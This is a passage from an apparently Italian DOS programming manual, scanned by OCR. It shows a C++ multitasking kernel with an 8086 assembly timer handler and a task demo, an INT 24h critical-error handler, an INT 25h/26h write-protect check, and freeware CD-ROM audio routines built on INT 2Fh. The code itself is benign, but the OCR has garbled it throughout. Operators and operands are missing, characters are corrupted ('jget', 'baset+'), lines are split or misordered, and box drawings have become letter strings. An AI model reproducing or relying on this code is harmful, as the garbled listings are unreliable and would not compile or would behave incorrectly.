temp=current_task->stack_ptr; // get stack pointer of task 


/* multi-tasking has stopped, get ready to return where we started */ 
else{ // someone called stop_tasks 
int_setvector(TIMER_INT,FP_OFF(old_timer_handler), 
FP_SEG(old_timer_handler)); 
temp=old_stack_ptr; // get back original stack 


/* return far pointer to stack_image to do task switch */ 
return(temp); 


timer.asm 
"VBKAKKKKKAKKAKKAKAKAKKAKKAKKAKAKAKKAKKKAKAKKKAKKAKKAKAKKAKKAKKAKAKAKAKKAKKAKKAKAKAKKAAKKAKAKAKKAKAKKAKKAKAKKKAAKKAKKAAKKAKAKKAKKAAKAA 
TIMER . ASM 
by Tom Green 
Timer interrupt handler calls original handler first and then calls the 


task_control object task switcher. a pointer to the stack "image" 
of the new task is returned by the task switcher. 
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; getCs 

; returns current code segment 

1 save_image 

; saves "image" of task as if interrupt had happened and then calls the 
; task_control object task switcher. a pointer to the stack "image" 

; of the new task is returned by the task switcher. 
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b Timer interrupt handler 


.MODEL SMALL 
.8086 


. DATA 
extrn _old_timer_handler :dword 
extrn _gl_tptr:word 


extrn __task_control_task_switch:near 


. CODE 


" KKKKKKKAKKKKAKAKAKAKAKAKKAKAKAKKAKAKAKAKAKAKKAAKAKAAKAKAKAKAKAKAKAKAKAKAKAKKAAKAKKAAKAKAAKAKKAAKAKAAKAKKAAKAKAAKAKKAAKAKAKAKAKAKAKARAKAARAAA 


; unsigned int getCS(void) - returns current code segment. 

; this is needed because of compiler bug. when a function is cast 

; to a far function, and you try to get the segment, DS is returned 
h instead of CS. 
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, 


_getCs proc near 

public _getCs 
MOV ax, CS 
ret 

_getCs endp 
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timer_handler - this replaces the MS-DOS timer tick interrupt (8H). 
this routine saves everything on stack, calls original timer interrupt 


handler, and then calls task_control object task switcher. 
" VBKAKKKKKAKKAKKAKAKAKKKAKKKAKAKAKKAKKAKKAKAKAKKAKKKAKAKAKKAKKAKAKKAKKAKKAKKAKAKAKAKKAKKAKAKKAKKAKKAKAKKAKAKKAKKAAKKAKAKKAKKAAKAA 


r 
; 
; 
t4 


, 


_timer_handler proc near 
public _timer_handler 
push ax ;save everything 
push bx 
push cx 
push dx 
push es 
push ds 
push si 
push di 
push bp 
MOV bp, dgroup 
mov ds,bp ;jget our data segment back 
pushf 
call dword ptr dgroup:_old timer handler ;call original handler 
sti 
xor dx, dx 
mov ax, Ss 
MOV bx, Sp 
push dx ;jpush 0 for last 2 parameters 
push dx ;meaning timer interrupt 
push ax 
push bx 
MOV dx,_gl_tptr ;jpush hidden pointer for C++ object 
push dx 
;stack is now set up for call to task_control object task_switch 
cli ;turn off interrupts for task switch 
call _ task control_task_switch 
;no need to clean up the stack because it will change 
sti 
mov ss,dx ;new ss returned in dx 
MOV Sp,ax ;new sp returned in ax 
pop bp ;restore registers 
pop di 
pop si 
pop ds 
pop es 
pop dx 
pop cx 
pop bx 
pop ax 
iret 


_timer_handler endp 


void save_image(unsigned int flag,signal *sig) - send, wait, block 
etc. all call through here to save the "image" of the task. this 
code simulates what will happen with an interrupt by saving the task 
image on the stack. the flag passed is passed on to the task_control 
object task switcher so it knows if it was called by the timer 
interrupt handler, send, wait, block, etc. the second parameter 

is a signal pointer which is used by send and wait and is passed 
through to the task switcher. 
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_Save_image proc near 

public _Save_image 

;since this is a C call we can destroy some registers (ax bx cx dx), 
;so now we will set up the stack as if an interrupt call had happened. 
;leave parameters on stack, because calling routine will adjust on 
;return. bx and cx will have the parameters that were passed. 


pop ax jget return address offset on stack 
pop bx ;jget first parameter off stack 
pop cx jget second parameter off stack 
push cx ;put them back on stack 
push bx 
pushf ;save flags for iret 
MOV dx,cs ;get code segment 
push dx ;save code segment for return address 
push ax ;push saved return address offset 
push ax ;save everything 
push bx 
push cx 
push dx 
push es 
push ds 
push si 
push di 
push bp 
sti 
MOV ax,sp ;stack pointer parameter 
push cx ;second parameter passed 
push bx ;first parameter passed 
mov bx, SS 
push bx ;far pointer to stack, parameter passed 
push ax 
MOV ax,_gl_tptr ;push hidden pointer for C++ object 
push ax 
;stack is now set up for call to task_control object task_switch 
cli ;turn off interrupts for task switch 
call _ task control_task_switch 
;jno need to clean up the stack because it will change 
sti 
mov ss, dx jnew ss returned in dx 
MOV Sp, ax jnew sp returned in ax 
pop bp ;jrestore registers 
pop di 
pop si 
pop ds 
pop es 
pop dx 
pop cx 
pop bx 
pop ax 
iret 
_Save_image endp 


end 


Infine con questo sorgente è possibile testare il multitasking precedente. 
taskdemo.cpp 


J* 
/* 
/* 


/* 
/* 
/* 
/* 


this file is a demonstration of how to use the C++ multi-tasking */ 
kernel. 5 tasks are run and the various means of task switching */ 
and communication are shown */ 


you must have the Zortech C++ compiler version 1.5 and linker and */ 
Microsoft MASM 5.xx to compile this code. */ 

type "ztc taskdemo task timer" and the ztc.com will take */ 

care of compiling, assembling, and linking */ 


#include <stdio.h> 
#include <disp.h> 
#include "task.hpp" 


void task0(void); 
void task1(void); 
void task2(void); 
void task3(void); 
void task4(void); 


/* 


our task_control object (just 1 please) */ 


task_control tasker; 


void main(void) 


{ 


} 


/* task objects */ 

task tO((func_ptr)task0,1024); 
task t1((func_ptr)task1,1024); 
task t2((func_ptr)task2,1024); 
task t3((func_ptr)task3,1024); 
task t4((func_ptr)task4,1024); 


/* add task objects to our task_control object ready q */ 
tasker.add_new_task(&t0); 
tasker.add_new_task(&t1); 
tasker.add_new_task(&t2); 
tasker.add_new_task(&t3); 
tasker.add_new_task(&t4); 


/* use zortech display package */ 
disp_open(); 

disp_move(0,0); 

disp_eeop(); 


/* start tasks up and wait for them to finish */ 
tasker.start_tasks(); 


disp_move(0,0); 
disp_eeop(); 
disp_close(); 


static unsigned long counter[]={OL,0L,0L,0L,0L}; 
static signal sig; 


/* task 0 prints the values of the counters for the other 4 tasks. */ 
/* lock is used to prevent task switching while the screen is being */ 
/* updated. when the task is finished, block is called to transfer */ 


/* control to the next task on the ready q */ 
void task0(void) 


while(1){ 
/* disable task switching */ 
tasker.lock(); 
disp_move(5,10); 
disp_printf("Task 1 %lx",counter[1]); 
disp_move(5,50); 
disp_printf("Task 2 %lx",counter[2]); 
disp_move(15,10); 
disp_printf("Task 3 %lx",counter[3]); 
disp_move(15,50); 
disp_printf("Task 4 %lx",counter[4]); 
/* if key pressed then stop the kernel and return */ 
if(kbhit()) 

tasker.stop_tasks(); 

/* re-enable task switching */ 
tasker.unlock(); 
/* let next task run */ 
tasker.block(); 


} 


/* tasks 1 and 2 just update counters. these tasks will run until */ 
/* a timer interrupt occurs, so they get a very large chunk of time */ 
/* to run, so the counters increase rapidly */ 


void task1(void) 


while(1){ 
counter[1]++; 
} 
} 
void task2(void) 
while(1){ 
counter[2]++; 
} 


/* task 3 waits for a signal from task 4 each time the counter is */ 

/* incremented. when a task waits, it is put on a signal q and the */ 

/* next task on the ready q is run. this means task 3 and 4 counters */ 
/* will increment very slowly. in task 4 when a signal is sent, the */ 

/* task signal q is checked for a task to put on the ready q. the task */ 
/* sending the signal is then placed on the ready q */ 


void task3(void) 
while(1){ 
counter[3]++; 


/* wait for a signal from task 4 */ 
tasker.wait(&sig); 


} 
void task4(void) 


while(1){ 


counter[4]++; 
/* send signal to task 3 */ 
tasker.send(&sig); 


INT 24H - CRITICAL ERROR HANDLER 


Quando il sistema operativo cerca di accedere ad una periferica hardware è 
questa genera un errore viene chiamato l’int 24h che generalmente crea un 
messaggio del tipo 

"Disk Error, (A)bort (R)etry (F)ail"... 

oppure 


"Abort, Retry, Ignore" 


Il seguente listato permette d’intercettare l’int24h. 


#include <bios.h> 
#include <dos.h> 
#include <stdio.h> 


#define CRIT_ERROR_HANDLER (0x24) 


/** FUNCTION PROTOTYPES **/ 

void install _24(void); 

void uninstall_24(void); 

void interrupt handle_24 (unsigned bp, unsigned di, unsigned si, 
unsigned ds, unsigned es, unsigned dx, 
unsigned cx, unsigned bx, unsigned ax); 

void fastprintz(int x, int y, int attr, char *s); 

int getbioskey(void); 


void interrupt (*oldvect)(); 
unsigned scr; /* The segment where the screen is */ 


/** install_24 
kKk 
** Installs the fancy interrupt handler. 
**/ 


void install _24(void) 

{ 
oldvect = getvect(CRIT_ERROR_HANDLER) ; /* save old handler */ 
setvect(CRIT_ERROR_HANDLER, handle _24); /* and install ours */ 


/* Find out if the screen is at 0xB000 or 0xB800 */ 
_AH = 0x0F; 
geninterrupt (0x10); 
if (_AL == 7) 
scr = 0xB000; 
else 
scr = 0xB800; 


void uninstall_24(void) 


/* Restore old handler */ 
setvect(CRIT_ERROR_HANDLER, oldvect); 


} 


static char screen_buf[9][52]; /* room for the saved part of screen */ 


void interrupt handle_24 (unsigned bp, unsigned di, unsigned si, 
unsigned ds, unsigned es, unsigned dx, 
unsigned cx, unsigned bx, unsigned ax) 


int err,key,ret=-1; 
int r,c,start; 


err = di & Ox00FF; /* Error message, from DOS. */ 


/* Save section of screen that will be overwritten */ 
for (r=8; r<17; r++) { 
start = (160 * r + 54); 
for (c=0; c<26; c++) { 
screen_buf[r-8][c*2] 


= peekb(scr, start+t+); 
screen_buf[r-8][c*2+1] = 


peekb(scr, start++); 


} 


/* Pop up error message */ 

fastprintz( 8,27,0x07, "OAAAAAAAAAAAAKAAAAAAAAARA +") ; 
fastprintz( 9,27,0x07, "°Error! on), 
fastprintz(10,27,0x07,"° o"); 


/* Common diagnosable problems */ 
switch(err) { 


case 0x00: 
fastprintz(11,27,0x07,"°Disk is write protected.°"); break; 
case 0x02: 
fastprintz(11,27,0x07,"°Disk drive is not ready.°"); break; 
default: 
fastprintz(11,17,0x07,"°Disk error. ©"); break; 
fastprintz(12,27,0x07,"° ON): 
fastprintz(13,27,0x07,"° Try again Sa 
fastprintz(13,29,0x0f,"T"); 
fastprintz(14,27,0x07,"° Exit this program 20); 


fastprintz(14,29,0x0f,"E"); 


/* In DOS 3.00 and later, they can also fail the disk access */ 
if (_osmajor > 2) { 

fastprintz(15,27,0x07,"° Cancel this operation °"); 
fastprintz(15,29,0x0f,"C"); 

} 

else 

fastprintz(15,27,0x07,"° id: 


fastprintz(16,27,0x07, "OAAAAAAAAAAAAAAAAAAAKAAARY" ) ; 
/* Call BIOS to get a single keystroke from the user */ 
do { 

key=getbioskey(); 


if (key & Ox00FF) 


key &= 0x00FF; 


switch(key) { 

case 't': case 'T': ret 0x0001; break; 

case 'e': case 'E': ret 0x0002; break; 

case 'c': case 'C': if (_osmajor > 2) ret = 0x0003; break; 
default: break; 

} 


} while (ret < 0); 


/* Restore that section of the screen */ 
for (r=8; r<17; r+t+) { 
start = (160*r + 54); 
for (c=0; c<26; c++) { 
pokeb(scr, start++, screen_buf[r-8][c*2]); 
pokeb(scr, start++, screen_buf[r-8][c*2+1]); 


} 


ax = ret; 
/* And please don't tell me I didn't use any of those parameters. */ 
#pragma warn -par 


#pragma warn .par 


/* fastprintz - shove an asciz string onto the screen */ 
void 
fastprintz(int y, int x, int attr, char *s) 


int i=0,base; 


base = (80*y+x)<<1; /* determine offset into screen */ 
while (s[i]!=0) { 

pokeb(scr, baset+, s[i++]); 

pokeb(scr, baset+, attr); 


/** getbioskey 
** get one key from the BIOS 


** Like TC bioskey(0), but doesn't nab control Break. It seems 
** that the TC bioskey was trying to block Ctrl-Breaks, which 
** it did by changing the Ctrl-Break handler, which it called 
** DOS to do. This made the interrupt handler reenter DOS which 
** is illegal. 


int getbioskey(void) 

{ 
union REGS regs; 
struct SREGS segregs; 


segread(&segregs); 

regs.h.ah = 0; 

int86x (0x16, &regs, &regs, &segregs); 
return regs.x.ax; 


INT 25H e 26H - ABSOLUTE READ AND WRITE 


Il seguente programmino usa gli int 25h e 26h per vedere se il drive A è 
utilizzabile e se non è protetto in scrittura. 


FREIRE REA IRA RE RICREARE RE VR RAICRE RR RIE RE RE RRRRRE RR RR RR 


* WR_PROT.C 

* 

* Check to see if a drive is write protected 

* 

ii Uses the DOS Interupts 25H and 26H to do an absolute 
* read, then write of logical sector 0 of the drive. 
* 

* resultant ERRORLEVELS: 

6 2 : error accessing drive 

* 1 : write protected 

È 0 : writable 

E, 


#include <dos.h> 
char buffer[2048]; 


int main() 


union REGS inregs, outregs; 
struct SREGS segregs; 
char far *bufferp; 


inregs.h.al 
inregs.x.Cx 
inregs.x.dx 
bufferp = bu 
inregs.x.bx 
segregs.ds 


0; /* drive number 0,1 = a,b: 128,129=c,d */ 
1; /* sectors to read */ 

0; /* starting sector number */ 
fer; 

FP_OFF(bufferp); 

FP_SEG(bufferp); 


HH = I IN 


int86x(0x25, &inregs, &outregs, &segregs); 
if (outregs.x.cflag == 1) { 
printf("error reading drive A\n"); 
return 2; 


} 


int86x(0x26, &inregs, &outregs, &segregs); 
if (outregs.x.cflag == 1) { 
printf("error writing drive A\n"); 
return 1; 


} 


return 0; 


INTERRUPT DI MULTIPLEXING E FUNZIONI LEGATE AL CD 


Il seguente programma è tra il freeware software ed è una raccolta di routine 
legate alla gestione del cd. 

Sono utili in molti casi in quanto sono in grado di leggere anche la lunghezza 
delle traccie dei cd musicali. 

Le spiegazioni delle funzioni sono nelle righe di REM del programma. 


/* CDROM AUDIO ROUTINES 
By Barry Egerter 


Written July 18, 1994 
Using Borland C++ 3.1 


Code : FREEWARE - alter and use at will. 


Internet Email: barry.egerter@softnet.com 
*/ 
#include <dos.h> 
#include <io.h> 
#include <mem.h> 
#include <fcntl.h> 


#define CDROM 0x21 
#define EJECT_TRAY 0 
#define RESET 2 
#define CLOSE TRAY 5 
#define MEDIA CHANGE 9 
#define BUSY 512 
#define TRACK_MASK 208 


typedef struct playinfo { 

unsigned char control; 
unsigned char adr; 
unsigned char track; 
unsigned char index; 
unsigned char min; 
unsigned char sec; 
unsigned char frame; 
unsigned char zero; 
unsigned char amin; 
unsigned char asec; 
unsigned char aframe; 


be 


typedef struct volumeinfo { 

unsigned char mode; 

unsigned char input0o; 
unsigned char volume0; 
unsigned char input1; 
unsigned char volume1; 
unsigned char input2; 
unsigned char volume2; 
unsigned char input3; 
unsigned char volume3; 


te 


struct { 
unsigned short drives; 
unsigned char first_drive; 
unsigned short current_track; 
unsigned long track_position; 
unsigned char track_type; 
unsigned char low_audio; 
unsigned char high audio; 
unsigned char disk_length_min; 
unsigned char disk _length_sec; 
unsigned char disk_length_frames; 


unsigned long endofdisk; 

unsigned char upc[7]; 

unsigned char diskid[6]; 

unsigned long status; 

unsigned short error; /* See description below */ 
} cdrom_data; 


/* CDROM_DATA.ERROR Description 


Bit 15 - Error bit 

Bit 14-10 - Reserved 

Bit 9 - Busy 

Bit 8 - Done 

Bit 7-0 - Error code (bit 15 on) 


Error codes are the following: 


Write-protect violation 
Unknown unit 

Drive not ready 

Unknown command 

CRC error 

Bad drive request structure length 
Seek error 

Unknown media 

Sector not found 
Printer out of paper 
write fault 

Read fault 

General failure 
Reserved 

Reserved 

Invalid disk change 
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*/ 


/* Multiplex Interrupt routines 
"borrowed" from Ralf Brown's MSDOS Interrupt List v4.1 


INT 21 - CD-ROM device driver - IOCTL INPUT 
= 4402h 
file handle referencing character device for CD-ROM driver 
CX = number of bytes to read 
DS:DX -> control block (see #0563) 
Return: CF clear if successful 
AX = number of bytes actually read 
CF set on error 
AX = error code (01h, 05h, 06h, 0Dh) (see #0770 at AH=59h) 
Note: the data returned depends on the first byte of the control block; the 
remainder of the control block is filled by the driver 
SeeAlso: AX=4403h"CD-ROM",INT 2F/AX=0802h 


DI 
x 
HI 


(Table 0562) 
Values for CD-ROM data being requested: 

00h device driver header address 

01h drive head location 

02h reserved 

03h error statistics 

04h audio channel info 

05h raw drive bytes (uninterpreted and device-specific) 
06h device status 

07h sector size 


08h volume size 

09h media change status 
OAh audio disk info 

OBh audio track info 

OCh audio Q-Channel info 
ODh audio sub-channel info 
OEh UPC code 


Format of CD-ROM control block: 
Offset Size Description (Table 0563) 
00h BYTE data being requested (see #0562) 
---function 00h- -- 
01h DWORD device driver header address (see also AH=52h) 
---function 01h- -- 
01h BYTE addressing mode 
00h HSG 
01h Red Book 
02h DWORD current location of drive's head 
logical sector number in HSG mode 
frame/second/minute/unused in Red Book mode 
(HSG sector = minute * 4500 + second * 75 + frame - 150) 
---function 03h- -- 
01h N BYTES undefined as of 5 Aug 88 specification 
---function 04h- -- 
01h BYTE input channel (0-3) for output channel 0 
02h BYTE volume for output channel 0 
03h BYTE input channel (0-3) for output channel 1 
04h BYTE volume for output channel 1 
05h BYTE input channel (0-3) for output channel 2 
06h BYTE volume for output channel 2 
07h BYTE input channel (0-3) for output channel 3 
08h BYTE volume for output channel 3 
Notes: output channels 0 and 1 are left and right, 2 and 3 are left prime 
and 
right prime; a volume of 00h is off 
the default setting is for each input channel to be assigned to the 
same-numbered output channel at full (FFh) volume 
---function 05h- -- 
01h BYTE number of bytes read 
02h 128 BYTES buffer for drive bytes 
---function 06h--- 
01h DWORD device parameters (see #0564) 
---function 07h--- 
01h BYTE read mode 
00h cooked 
01h raw 
02h WORD sector size in bytes 
---function 08h- -- 
01h DWORD volume size in sectors 
---function 09h- -- 
01h BYTE media change status 
00h don't know 
01h media unchanged 
FFh media has been changed 
---function 0Ah- -- 
01h BYTE lowest audio track number 
02h BYTE highest audio track number 
03h DWORD start address of lead-out track (Red Book format) 
--function OBh- -- 
01h BYTE track number (set by caller) 
02h DWORD starting point of track (Red Book format) 
06h BYTE track control info 


bits 15,14,12: track type (notice: bits not contiguous! ) 
000 two audio channels, no pre-emphasis 
001 two audio channels with pre-emphasis 
010 data track 
100 four audio channels, no pre-emphasis 
101 four audio channels with pre-emphasis 
other reserved 
bit 13: digital copy permitted 
---function 0Ch- -- 
01h BYTE CONTROL and ADR byte (as received from drive) 
02h BYTE track number 
03h BYTE point or index 
04h BYTE minute \ 
05h BYTE second > running time within track 
06h BYTE frame / 
07h BYTE zero 
08h BYTE "AMIN" or "PMIN" \ 
09h BYTE "ASEC" or "PSEC" > running time on disk 
OAh BYTE "AFRAME" or "PFRAME" / 
---function 0ODh- -- 
01h DWORD starting frame address (Red Book format) 
05h DWORD transfer address 
09h DWORD number of sectors to read 
Note: copies 96 bytes of sub-channel info per sector into buffer 
---function 0Eh- -- 
01h BYTE CONTROL and ADR byte 
02h 7 BYTEs UPC/EAN code (13 BCD digits, low-order nybble of last byte is 
0) 
09h BYTE zero 
OAh BYTE "AFRAME" 


Bitfields for CD-ROM device parameters: 


Bit(s) Description (Table 0564) 

0 door open 

1 door unlocked 

2 supports raw reading in addition to cooked 
3 writable 

4 can play audio/video tracks 

5 supports interleaving 

6 reserved 

7 supports prefetch requests 

8 supports audio channel control 

9 supports Red Book addressing in addition to HSG 
10 audio is playing 

*/ 


static union REGS inregs, outregs; 
static struct SREGS sregs; 


void device request (void *block) 
{ 
inregs.x.ax 
inregs.x.cx = cdrom _data.first_drive; 
inregs.x.bx FP_OFF (block); 
sregs.es = FP_SEG (block); 
int86x (0x2f, &inregs, &outregs, &sregs); 


0x1510; 


void red_book (unsigned long value, unsigned char *min, unsigned char *sec, 
unsigned char *frame) 


value & 0x000000ff; 
(value & 0x0000ff00) >> 


(value & 0x00ff0000) >> 16; 


unsigned long hsg (unsigned long 


{ 


value) 
unsigned char min, sec, frame; 


red_book (value, &min, &sec, &frame); 
value (unsigned long)min * 4500; 
value += (short)sec * 75; 

value += frame - 150; 

return value; 


unsigned long cd_head_ position (void) 

struct { 
unsigned 
unsigned 


char length; 

char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 
unsigned char unused[4]; 

} tray_request; 


struct { 

unsigned char mode; 

unsigned char adr_mode; 

unsigned long address; 
} head_data; 
tray_request.length = sizeof (tray_request); 
tray_request.subunit = 0; 
tray_request.comcode = 3; 
tray_request.media = tray_request.sector = tray_request.volid = 0; 
tray_request.address = (unsigned long)&head_data; 
tray_request.bytes = 6; 


head_data.mode 0x01; 
head_data.adr_mode Ox00; 
device_request (&tray_request); 

cdrom _data.error tray_request.status; 
return head_data.address; 


void cd_get_ volume (struct volumeinfo *vol) 


struct { 
unsigned 
unsigned 
unsigned 
unsigned 


char length; 
char subunit; 
char comcode; 
short status; 


char ununsed[8]; 

unsigned char media; 

unsigned long address; 

unsigned short bytes; 

unsigned short sector; 

unsigned long volid; 
} tray_request; 


tray_request.length = sizeof (tray_request); 
tray_request.subunit 0; 
tray_request.comcode 3; 

tray_request.media = 
tray_request.media = 
tray_request.address 
tray_request.bytes = 
vol->mode = 0x04; 
device_request (&tray_request); 

cdrom _data.error = tray_request.status; 


ray_request.sector = tray_request.volid = 0; 
(unsigned long)vol; 
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void cd_set_ volume (struct volumeinfo *vol) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned char unused[4]; 

} cd_request; 


vol->mode = 3; 

cd_request.length = sizeof (cd_request); 
cd_request.subunit = 
cd_request.comcode = 
cd_request.media = 0; 
cd_request.address = 
cd_request.bytes = 9; 
device_request (&cd_request); 

cdrom _data.error = cd_request.status; 


(unsigned long)vol; 


short cd_getupc (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 

} tray_request; 


struct { 

unsigned char mode; 

unsigned char adr; 

unsigned char upc[7]; 

unsigned char zero; 

unsigned char aframe; 
} upc_data; 
tray_request.length = sizeof (tray_request); 
tray_request.subunit = 0; 
tray_request.comcode = 3; 
tray_request.media = 0; 
tray_request.media = tray_request.sector = tray _request.volid = 0; 
tray_request.address = (unsigned long)&upc_data; 
tray_request.bytes = 11; 
upc_data.mode = 0x0e; 
upc_data.adr = 2; 
device_request (&tray_request); 
cdrom _data.error = tray_request.status; 
if (upc_data.adr == 0) 

memset (&upc_data.upc, 0, 7); 
memcpy (&cdrom _data.upc[0], &upc_data.upc[0], 7); 
return 1; 


void cd_get_audio_info (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
long address; 
short bytes; 
short sector; 
long volid; 

} ioctli; 


struct { 
unsigned char mode; 
unsigned char lowest; 
unsigned char highest; 
unsigned long address; 
} track_data; 


ioctli.length = sizeof (ioctli); 

ioctli.subunit = 0; 

ioctli.comcode = 3; 

ioctli.media = 0; 

ioctli.sector = 0; 

ioctli.volid = 0; 

ioctli.address = (long)&track_data; 

ioctli.bytes = sizeof (track data); 

track_data.mode = 0x0a; 

device _request (&ioctli); 

memcpy (&cdrom_data.diskid, &track_data.lowest, 6); 

cdrom_data.low_ audio = track_data.lowest; 

cdrom _data.high_audio = track_data.highest; 

red_book (track _data.address, &cdrom_data.disk_length_min, 
&cdrom_data.disk_length_sec, &cdrom _data.disk_length_frames); 


cdrom_data.endofdisk = hsg (track_data.address); 
cdrom_data.error = ioctli.status; 


} 


void cd_set_track (short tracknum) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 

} tray_request; 


struct { 
unsigned char mode; 
unsigned char track; 
unsigned long address; 
unsigned char control; 
} track_data; 


tray_request.length = sizeof (tray_request); 
tray_request.subunit 0; 
tray_request.comcode 3; 

tray_request.media = 0; 
tray_request.media = tray_request.sector = tray_request.volid 
tray_request.address = (unsigned long)&track_data; 
tray_request.bytes = 7; 

track_data.mode = 0x0b; 
track_data.track = tracknum; 

device_request (&tray_request); 

cdrom _data.error = tray_request.status; 

cdrom _data.track_position = hsg (track _data.address); 
cdrom_data.current_track = tracknum; 

cdrom _data.track_type = track_data.control & TRACK_MASK; 
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unsigned long get_track_length (short tracknum) 


{ 


unsigned long start, finish; 

unsigned short ct; 

ct = cdrom _data.current_track; 
cd_set_track (tracknum); 

start = cdrom data.track_position; 

if (tracknum < cdrom _data.high_audio) 


cd_set_track (tracknumt1); 
finish = cdrom _data.track_position; 


else finish = cdrom_data.endofdisk; 
cd_set_track (ct); 


finish -= start; 


return finish; 


} 


void cd_track_length (short tracknum, unsigned char *min, unsigned char *sec, 
unsigned char *frame) 


{ 
unsigned long value; 
value = get_track_length (tracknum); 
value += 150; 
*frame = value % 75; 
value -= *frame; 
value /= 75; 
*sec = value % 60; 
value -= *sec; 
value /= 60; 
*min = value; 

} 


void cd_status (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 

} tray_request; 


struct { 
unsigned char mode; 
unsigned long status; 
} cd_data; 


tray_request.length = sizeof (tray_request); 
tray_request.subunit 0; 

tray_request.comcode 3; 
tray_request.media 
tray_request.media 
tray_request.address 
tray_request.bytes 
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_request.sector = tray _request.volid = 0; 
nsigned long)&cd_data; 
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cd_data.mode = 0x06; 

device_request (&tray_request); 
cdrom_data.status = cd _data.status; 
cdrom _data.error = tray_request.status; 


void cd_seek (unsigned long location) 
{ 
unsigned char min, sec, frame; 
struct { 
unsigned char length; 
unsigned char subunit; 


unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char addressmode; 
unsigned long transfer; 
unsigned short sectors; 
unsigned long seekpos; 

} play_request; 


play_request.length = sizeof (play_request); 
play_request.subunit = 0; 
play_request.comcode = 131; 
play_request.addressmode = 0; 
play_request.transfer = 0; 
play_request.sectors 0; 
play_request.seekpos location; 
device_request (&play_request); 

cdrom _data.error = play _request.status; 


void cd_play_ audio (unsigned long begin, unsigned long end) 


{ 


unsigned long leng; 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
Char ununsed[8]; 
unsigned char addressmode; 
unsigned long start; 
unsigned long playlength; 
} play_request; 


play_request.length = sizeof (play_request); 
play_request.subunit = 0; 
play_request.comcode = 132; 
play_request.addressmode = 0; 
play_request.start = begin; 
play_request.playlength = end-begin; 

device _request (&play_request); 

cdrom _data.error = play _request.status; 


void cd_stop_audio (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 

} stop_request; 


stop_request.length = sizeof (stop_request); 
stop_request.subunit = 0; 
stop_request.comcode = 133; 

device_request (&stop_request); 

cdrom _data.error = stop_request.status; 


void cd_resume_ audio (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 

} stop_request; 


stop_request.length = sizeof (stop_request); 
stop_request.subunit 0; 
stop_request.comcode 136; 

device _request (&stop_request); 

cdrom _data.error = stop_request.status; 


void cd_cmd (unsigned char mode) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned char unused[4]; 

} tray_request; 


unsigned char cd_mode; 
cd_mode = mode; 


tray_request.length = sizeof (tray_request); 
tray_request.subunit 0; 


tray_request.comcode = 12; 

tray_request.media = 0; 

tray_request.address = (unsigned long)&cd_mode; 
tray_request.bytes = 1; 


device_request (&tray_request); 
cdrom _data.error = tray_request.status; 


void cd_getpos (struct playinfo *info) 


struct { 

unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 


} tray_request; 


tray_request.length = sizeof (tray_request); 


tray_request.subunit = 0; 
tray_request.comcode = 3; 
tray_request.media = 0; 

tray_request.media = t 
tray_request.address = (unsigned long)info; 
tray_request.bytes = 6; 


info->control = 12; 
device _request (&tray_request); 
cdrom _data.error = tray _request.status; 


short cdrom_installed (void) 
{ 
inregs.h.ah 
inregs.h.al 0x00; 
inregs.x.bx = 0; 
int86 (0x2f, &inregs, &outregs); 
if (outregs.x.bx == 0) 
return (0); 
cdrom _data.drives = outregs.x.bx; 
cdrom_data.first_drive = outregs.x.Cx; 
cd_get_audio_info (); 
return (1); 


0x15; 


short cd_done play (void) 


cd_cmd (CLOSE_TRAY); 
return ((cdrom_data.error & BUSY) == 0); 


} 


short cd_mediach (void) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned short sector; 
unsigned long volid; 

} tray_request; 


struct { 
unsigned char mode; 
unsigned char media; 


} cd_data; 

tray_request.length = sizeof (tray_request); 
tray_request.subunit = 0; 

tray_request.comcode = 3; 

tray_request.media = 0; 

tray_request.media = tray_request.sector = tray_request 


ray_request.sector = tray_request.volid = 0; 


.volid = 0; 


tray_request.address = (unsigned long)&cd_data; 
tray_request.bytes = 2; 

cd_data.mode = 0x09; 

device_request (&tray_request); 

cdrom _data.error = tray_request.status; 

return cd_data.media; 


void cd_lock (unsigned char doormode) 


struct { 
unsigned char length; 
unsigned char subunit; 
unsigned char comcode; 
unsigned short status; 
char ununsed[8]; 
unsigned char media; 
unsigned long address; 
unsigned short bytes; 
unsigned char unused[4]; 

} tray_request; 


struct { 
unsigned char mode; 
unsigned char media; 
} cd_data; 


tray_request.length = sizeof (tray_request); 
tray_request.subunit ; 
tray_request.comcode 
tray_request.media = 
tray_request.address 
tray_request.bytes = 
cd_data.mode = 1; 
cd_data.media = doormode; 
device_request (&tray_request); 

cdrom _data.error = tray_request.status; 
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12; 


(unsigned long)&cd_data; 
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LINGUAGGIO ASSEMBLER E ARCHITETTURA SOFTWARE 


Voglio specificare che questo non vuole essere un manuale dettagliato di 
